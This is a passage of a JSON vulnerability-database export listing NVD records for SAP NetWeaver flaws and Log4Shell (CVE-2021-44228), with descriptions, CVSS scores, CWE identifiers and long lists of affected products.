"cpe:/a:sap:netweaver_application_server_abap:krnl64uc_7.22ext", "cpe:/a:sap:netweaver_application_server_abap:krnl64uc_7.53", "cpe:/a:sap:netweaver_application_server_abap:krnl64uc_8.04", "cpe:/a:sap:netweaver_application_server_abap:7.85", "cpe:/a:sap:web_dispatcher:7.81", "cpe:/a:sap:netweaver_application_server_abap:7.87", "cpe:/a:sap:web_dispatcher:7.87"], "id": "CVE-2022-22536", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22536", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sap:netweaver_application_server_abap:krnl64uc_7.22:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:7.87:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:7.81:*:*:*:*:*:*:*", "cpe:2.3:a:sap:web_dispatcher:7.87:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64uc_7.53:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:7.85:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64nuc_7.22:*:*:*:*:*:*:*", "cpe:2.3:a:sap:web_dispatcher:7.22ext:*:*:*:*:*:*:*", "cpe:2.3:a:sap:web_dispatcher:7.77:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:7.77:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:8.04:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64uc_7.22ext:*:*:*:*:*:*:*", "cpe:2.3:a:sap:web_dispatcher:7.81:*:*:*:*:*:*:*", "cpe:2.3:a:sap:web_dispatcher:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:sap:web_dispatcher:7.49:*:*:*:*:*:*:*", "cpe:2.3:a:sap:web_dispatcher:7.85:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64nuc_7.49:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:sap:web_dispatcher:7.86:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:7.86:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64uc_8.04:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:7.49:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64uc_7.49:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64nuc_7.22ext:*:*:*:*:*:*:*", "cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:08:45", "description": "In SAP NetWeaver Application Server Java - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC, 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, an unauthenticated attacker could submit a crafted HTTP server request which triggers improper shared memory buffer handling. This could allow the malicious payload to be executed and hence execute functions that could be impersonating the victim or even steal the victim's logon session.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T23:15:00", "type": "cve", "title": "CVE-2022-22532", "cwe": ["CWE-444"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22532"], "modified": "2022-09-30T13:20:00", "cpe": ["cpe:/a:sap:netweaver_application_server_java:krnl64uc_7.22", "cpe:/a:sap:netweaver_application_server_java:krnl64nuc_7.22", "cpe:/a:sap:netweaver_application_server_java:krnl64uc_7.22ext", "cpe:/a:sap:netweaver_application_server_java:7.22", "cpe:/a:sap:netweaver_application_server_java:7.49", "cpe:/a:sap:netweaver_application_server_java:krnl64nuc_7.49", "cpe:/a:sap:netweaver_application_server_java:7.53", "cpe:/a:sap:netweaver_application_server_java:krnl64uc_7.49", "cpe:/a:sap:netweaver_application_server_java:krnl64nuc_7.22ext"], "id": "CVE-2022-22532", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22532", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sap:netweaver_application_server_java:krnl64nuc_7.22:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:krnl64nuc_7.22ext:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:krnl64nuc_7.49:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:7.49:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:krnl64uc_7.22:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:krnl64uc_7.49:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:krnl64uc_7.22ext:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:08:45", "description": "Due to improper error handling in SAP NetWeaver Application Server Java - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC, 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, an attacker could submit multiple HTTP server requests resulting in errors, such that it consumes the memory buffer. This could result in system shutdown rendering the system unavailable.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-09T23:15:00", "type": "cve", "title": "CVE-2022-22533", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22533"], "modified": "2022-10-27T01:09:00", "cpe": ["cpe:/a:sap:netweaver_application_server_java:krnl64uc_7.22", "cpe:/a:sap:netweaver_application_server_java:krnl64nuc_7.22", "cpe:/a:sap:netweaver_application_server_java:krnl64uc_7.22ext", "cpe:/a:sap:netweaver_application_server_java:7.22", "cpe:/a:sap:netweaver_application_server_java:7.49", "cpe:/a:sap:netweaver_application_server_java:krnl64nuc_7.49", "cpe:/a:sap:netweaver_application_server_java:7.53", "cpe:/a:sap:netweaver_application_server_java:krnl64uc_7.49", "cpe:/a:sap:netweaver_application_server_java:krnl64nuc_7.22ext"], "id": "CVE-2022-22533", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22533", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:sap:netweaver_application_server_java:krnl64nuc_7.22:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:krnl64nuc_7.22ext:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:krnl64nuc_7.49:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:7.49:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:krnl64uc_7.22:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:krnl64uc_7.49:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_application_server_java:krnl64uc_7.22ext:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T16:08:51", "description": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T10:15:00", "type": "cve", "title": "CVE-2021-44228", "cwe": ["CWE-400", "CWE-20", "CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-07T03:39:00", "cpe": ["cpe:/a:cisco:wan_automation_engine:7.5", "cpe:/a:cisco:crosswork_data_gateway:3.0.0", "cpe:/a:cisco:unified_sip_proxy:010.000\\(000\\)", "cpe:/a:cisco:paging_server:14.0\\(1\\)", "cpe:/a:cisco:video_surveillance_manager:7.14\\(3.025\\)", "cpe:/a:siemens:energy_engage:3.1", "cpe:/a:siemens:desigo_cc_advanced_reports:4.0", "cpe:/a:cisco:common_services_platform_collector:002.009\\(001.001\\)", "cpe:/a:cisco:enterprise_chat_and_email:12.5\\(1\\)", "cpe:/a:siemens:mendix:*", "cpe:/a:cisco:unified_contact_center_management_portal:12.6\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1h\\)", "cpe:/a:cisco:integrated_management_controller_supervisor:2.3.2.0", "cpe:/a:cisco:evolved_programmable_network_manager:5.1", "cpe:/a:cisco:wan_automation_engine:7.2.3", "cpe:/a:cisco:firepower_threat_defense:7.0.0", "cpe:/a:siemens:captial:2019.1", "cpe:/a:cisco:identity_services_engine:002.007\\(000.356\\)", "cpe:/o:debian:debian_linux:10.0", "cpe:/a:intel:computer_vision_annotation_tool:-", "cpe:/a:cisco:identity_services_engine:003.001\\(000.518\\)", "cpe:/a:siemens:desigo_cc_info_center:5.1", "cpe:/a:cisco:connected_analytics_for_network_deployment:008.000.000", "cpe:/a:cisco:unified_contact_center_enterprise:12.0\\(1\\)", "cpe:/a:cisco:identity_services_engine:2.4.0", "cpe:/a:cisco:wan_automation_engine:7.2.1", "cpe:/a:cisco:smart_phy:3.1.4", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:cisco:webex_meetings_server:3.0", "cpe:/a:cisco:paging_server:8.4\\(1\\)", "cpe:/a:cisco:optical_network_controller:1.1", "cpe:/a:cisco:firepower_threat_defense:6.6.0", "cpe:/a:cisco:common_services_platform_collector:002.009\\(000.000\\)", "cpe:/a:cisco:fog_director:-", "cpe:/a:cisco:webex_meetings_server:4.0", "cpe:/a:netapp:active_iq_unified_manager:-", "cpe:/a:intel:genomics_kernel_library:-", "cpe:/a:siemens:logo\\!_soft_comfort:*", "cpe:/a:cisco:unified_communications_manager:11.5\\(1\\)", "cpe:/a:cisco:firepower_threat_defense:7.1.0", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.005.000.000", "cpe:/o:cisco:fxos:7.1.0", "cpe:/a:cisco:dna_spaces_connector:-", "cpe:/a:cisco:sd-wan_vmanage:20.6", "cpe:/a:cisco:smart_phy:3.2.1", "cpe:/a:netapp:cloud_secure_agent:-", "cpe:/a:cisco:packaged_contact_center_enterprise:11.6\\(1\\)", "cpe:/a:cisco:iot_operations_dashboard:-", "cpe:/a:cisco:virtual_topology_system:2.6.6", "cpe:/a:siemens:teamcenter:*", "cpe:/a:cisco:network_dashboard_fabric_controller:11.1\\(1\\)", "cpe:/a:cisco:wan_automation_engine:7.6", "cpe:/a:cisco:mobility_services_engine:-", "cpe:/a:cisco:emergency_responder:11.5\\(4.66000.14\\)", "cpe:/a:netapp:oncommand_insight:-", "cpe:/a:cisco:connected_analytics_for_network_deployment:7.3", "cpe:/a:siemens:comos:*", "cpe:/a:siemens:siveillance_identity:1.5", "cpe:/a:cisco:unified_sip_proxy:010.000\\(001\\)", "cpe:/a:cisco:unified_workforce_optimization:11.5\\(1\\)", "cpe:/a:cisco:network_dashboard_fabric_controller:11.2\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1a\\)", "cpe:/a:cisco:crosswork_platform_infrastructure:4.1.0", "cpe:/a:siemens:sipass_integrated:2.85", "cpe:/a:cisco:unity_connection:11.5", "cpe:/a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1.22900.6\\)", "cpe:/a:cisco:unified_communications_manager_im_and_presence_service:11.5\\(1\\)", "cpe:/a:cisco:unified_sip_proxy:010.002\\(000\\)", "cpe:/a:cisco:broadworks:-", "cpe:/a:cisco:sd-wan_vmanage:20.4", "cpe:/a:cisco:wan_automation_engine:7.3", "cpe:/a:cisco:firepower_threat_defense:6.7.0", "cpe:/a:cisco:unified_customer_voice_portal:11.6", "cpe:/a:siemens:xpedition_enterprise:-", "cpe:/a:siemens:siveillance_vantage:*", "cpe:/a:cisco:evolved_programmable_network_manager:4.1.1", "cpe:/a:cisco:network_insights_for_data_center:6.0\\(2.1914\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1l\\)", "cpe:/a:cisco:integrated_management_controller_supervisor:002.003\\(002.000\\)", "cpe:/a:cisco:crosswork_network_automation:2.0.0", "cpe:/a:siemens:desigo_cc_advanced_reports:4.2", "cpe:/a:cisco:unified_customer_voice_portal:12.5", "cpe:/a:cisco:firepower_threat_defense:6.2.3", "cpe:/a:netapp:cloud_manager:-", "cpe:/a:cisco:ucs_central_software:2.0\\(1k\\)", "cpe:/a:cisco:automated_subsea_tuning:02.01.00", "cpe:/a:siemens:operation_scheduler:1.1.3", "cpe:/a:cisco:emergency_responder:11.5", "cpe:/a:cisco:video_surveillance_manager:7.14\\(2.26\\)", "cpe:/a:cisco:smart_phy:3.1.5", "cpe:/a:cisco:cyber_vision:4.0.2", "cpe:/a:cisco:unified_communications_manager:11.5\\(1\\)su3", "cpe:/o:cisco:fxos:6.3.0", "cpe:/a:cisco:unified_customer_voice_portal:12.6\\(1\\)", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.18119.2\\)", "cpe:/a:cisco:common_services_platform_collector:002.009\\(001.000\\)", "cpe:/a:cisco:network_dashboard_fabric_controller:11.4\\(1\\)", "cpe:/a:intel:system_studio:-", "cpe:/a:siemens:sipass_integrated:2.80", "cpe:/a:cisco:enterprise_chat_and_email:12.6\\(1\\)", "cpe:/a:cisco:identity_services_engine:002.004\\(000.914\\)", "cpe:/a:siemens:xpedition_package_integrator:-", "cpe:/a:cisco:ucs_central_software:2.0\\(1g\\)", "cpe:/o:siemens:sppa-t3000_ses3000_firmware:*", "cpe:/a:siemens:energyip_prepay:3.8", "cpe:/a:cisco:unified_contact_center_enterprise:12.6\\(1\\)", "cpe:/a:siemens:solid_edge_harness_design:2020", "cpe:/a:cisco:cx_cloud_agent:001.012", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.003", "cpe:/a:netapp:ontap_tools:-", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.001.000", "cpe:/a:cisco:unified_contact_center_express:12.6\\(2\\)", "cpe:/a:cisco:unified_customer_voice_portal:11.6\\(1\\)", "cpe:/o:cisco:fxos:7.0.0", "cpe:/a:cisco:evolved_programmable_network_manager:4.0", "cpe:/a:cisco:common_services_platform_collector:002.010\\(000.000\\)", "cpe:/a:siemens:solid_edge_cam_pro:*", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.004.000.003", "cpe:/a:cisco:enterprise_chat_and_email:12.0\\(1\\)", "cpe:/a:siemens:sentron_powermanager:4.1", "cpe:/a:cisco:unified_customer_voice_portal:12.0\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\\(2\\)", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.001.001", "cpe:/a:cisco:crosswork_network_automation:4.1.0", "cpe:/a:cisco:crosswork_network_automation:-", "cpe:/a:intel:system_debugger:-", "cpe:/a:cisco:crosswork_zero_touch_provisioning:3.0.0", "cpe:/a:siemens:head-end_system_universal_device_integration_system:*", "cpe:/o:fedoraproject:fedora:35", "cpe:/a:siemens:desigo_cc_advanced_reports:4.1", "cpe:/a:cisco:unified_contact_center_enterprise:11.6\\(2\\)", "cpe:/a:siemens:industrial_edge_management:*", "cpe:/a:cisco:unified_sip_proxy:010.002\\(001\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1e\\)", "cpe:/a:cisco:smart_phy:3.1.3", "cpe:/a:cisco:finesse:12.5\\(1\\)", "cpe:/a:cisco:identity_services_engine:003.002\\(000.116\\)", "cpe:/a:cisco:smart_phy:3.1.2", "cpe:/a:siemens:energyip:9.0", "cpe:/a:cisco:smart_phy:21.3", "cpe:/a:siemens:desigo_cc_advanced_reports:5.1", "cpe:/a:cisco:paging_server:9.0\\(1\\)", "cpe:/a:siemens:vesys:2019.1", "cpe:/a:cisco:network_dashboard_fabric_controller:11.3\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1f\\)", "cpe:/a:cisco:evolved_programmable_network_manager:5.0", "cpe:/a:cisco:evolved_programmable_network_manager:3.0", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\\(3\\)", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.17900.52\\)", "cpe:/a:cisco:sd-wan_vmanage:20.8", "cpe:/a:cisco:sd-wan_vmanage:20.7", "cpe:/a:cisco:cloudcenter_suite:4.10\\(0.15\\)", "cpe:/a:cisco:crosswork_network_automation:3.0.0", "cpe:/a:cisco:video_surveillance_manager:7.14\\(4.018\\)", "cpe:/a:siemens:siveillance_command:4.16.2.1", "cpe:/a:cisco:crosswork_optimization_engine:3.0.0", "cpe:/a:cisco:unified_contact_center_enterprise:12.5\\(1\\)", "cpe:/o:cisco:fxos:6.2.3", "cpe:/a:cisco:ucs_central_software:2.0\\(1c\\)", "cpe:/a:cisco:sd-wan_vmanage:20.3", "cpe:/a:cisco:firepower_threat_defense:6.4.0", "cpe:/a:cisco:firepower_threat_defense:6.3.0", "cpe:/a:cisco:crosswork_network_controller:3.0.0", "cpe:/a:cisco:unified_contact_center_express:12.5\\(1\\)", "cpe:/a:cisco:unified_customer_voice_portal:12.5\\(1\\)", "cpe:/a:cisco:firepower_threat_defense:6.5.0", "cpe:/a:siemens:siguard_dsa:4.4", "cpe:/a:intel:oneapi_sample_browser:-", "cpe:/a:cisco:common_services_platform_collector:002.009\\(000.001\\)", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.22900.28\\)", "cpe:/a:cisco:dna_spaces:-", "cpe:/a:siemens:nx:*", "cpe:/a:cisco:unity_connection:11.5\\(1.10000.6\\)", "cpe:/a:siemens:energyip:8.6", "cpe:/a:cisco:video_surveillance_manager:7.14\\(1.26\\)", "cpe:/a:cisco:crosswork_network_automation:4.1.1", "cpe:/a:cisco:finesse:12.6\\(1\\)", "cpe:/a:cisco:identity_services_engine:002.006\\(000.156\\)", "cpe:/a:cisco:cloudcenter_suite:5.5\\(0\\)", "cpe:/a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.002.000", "cpe:/a:cisco:cloudcenter_suite:5.3\\(0\\)", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.18900.97\\)", "cpe:/a:cisco:sd-wan_vmanage:20.5", "cpe:/a:cisco:unified_computing_system:006.008\\(001.000\\)", "cpe:/a:cisco:intersight_virtual_appliance:1.0.9-343", "cpe:/a:cisco:paging_server:8.5\\(1\\)", "cpe:/o:fedoraproject:fedora:34", "cpe:/a:cisco:evolved_programmable_network_manager:4.1", "cpe:/a:netapp:cloud_insights:-", "cpe:/a:siemens:siguard_dsa:4.3", "cpe:/a:intel:audio_development_kit:-", "cpe:/a:cisco:network_dashboard_fabric_controller:11.0\\(1\\)", "cpe:/a:cisco:prime_service_catalog:12.1", "cpe:/o:cisco:fxos:6.7.0", "cpe:/a:cisco:emergency_responder:11.5\\(4.65000.14\\)", "cpe:/a:cisco:data_center_network_manager:11.3\\(1\\)", "cpe:/a:cisco:paging_server:9.1\\(1\\)", "cpe:/a:cisco:dna_center:2.2.2.8", "cpe:/a:cisco:paging_server:8.3\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1d\\)", "cpe:/a:cisco:evolved_programmable_network_manager:3.1", "cpe:/a:cisco:cloudcenter_suite:5.4\\(1\\)", "cpe:/a:cisco:sd-wan_vmanage:20.6.1", "cpe:/o:cisco:fxos:6.4.0", "cpe:/a:cisco:identity_services_engine:003.000\\(000.458\\)", "cpe:/a:cisco:common_services_platform_collector:002.009\\(001.002\\)", "cpe:/a:apache:log4j:2.0", "cpe:/a:cisco:connected_mobile_experiences:-", "cpe:/a:cisco:ucs_central_software:2.0\\(1b\\)", "cpe:/a:cisco:cyber_vision_sensor_management_extension:4.0.2", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\\(1\\)", "cpe:/a:cisco:unified_intelligence_center:12.6\\(1\\)", "cpe:/a:cisco:common_services_platform_collector:002.009\\(000.002\\)", "cpe:/a:siemens:siveillance_viewpoint:*", "cpe:/o:cisco:fxos:6.5.0", "cpe:/a:cisco:unified_customer_voice_portal:12.0", "cpe:/a:siemens:energyip:8.7", "cpe:/a:cisco:paging_server:9.0\\(2\\)", "cpe:/a:cisco:network_services_orchestrator:-", "cpe:/a:siemens:sentron_powermanager:4.2", "cpe:/a:siemens:energyip_prepay:3.7", "cpe:/a:cisco:unified_contact_center_enterprise:12.6\\(2\\)", "cpe:/a:cisco:unified_intelligence_center:12.6\\(2\\)", "cpe:/a:cisco:cloudcenter_suite:5.5\\(1\\)", "cpe:/a:intel:sensor_solution_firmware_development_kit:-", "cpe:/a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1\\)", "cpe:/a:cisco:wan_automation_engine:7.4", "cpe:/a:siemens:desigo_cc_advanced_reports:5.0", "cpe:/a:cisco:wan_automation_engine:7.2.2", "cpe:/a:siemens:siguard_dsa:4.2", "cpe:/a:cisco:wan_automation_engine:7.1.3", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.21900.40\\)", "cpe:/a:percussion:rhythmyx:7.3.2", "cpe:/a:siemens:opcenter_intelligence:3.2", "cpe:/a:siemens:desigo_cc_info_center:5.0", "cpe:/a:cisco:paging_server:12.5\\(2\\)", "cpe:/a:cisco:unified_contact_center_express:12.6\\(1\\)", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.000", "cpe:/a:siemens:siveillance_control_pro:*", "cpe:/o:cisco:fxos:6.6.0", "cpe:/a:siemens:spectrum_power_4:4.70", "cpe:/a:siemens:energyip:8.5", "cpe:/a:netapp:snapcenter:-", "cpe:/a:siemens:spectrum_power_7:2.30", "cpe:/a:siemens:siveillance_identity:1.6", "cpe:/o:debian:debian_linux:11.0", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.005.000.", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.000.001", "cpe:/a:intel:secure_device_onboard:-", "cpe:/a:cisco:network_assurance_engine:6.0\\(2.1912\\)"], "id": "CVE-2021-44228", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44228", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:cisco:firepower_threat_defense:6.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(000\\):*:*:*:*:*:*:*", "cpe:2.3:a:intel:computer_vision_annotation_tool:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_identity:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_control_pro:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.3\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(3.025\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.007\\(000.356\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_identity:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_info_center:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:-:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_center:2.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_mobile_experiences:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1g\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es01:*:*:*:*:*:*", "cpe:2.3:a:cisco:automated_subsea_tuning:02.01.00:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_platform_infrastructure:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):-:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:mobility_services_engine:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sipass_integrated:2.80:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(0\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:4.10\\(0.15\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.3\\(0\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18119.2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.002\\):*:*:*:*:*:*:*", 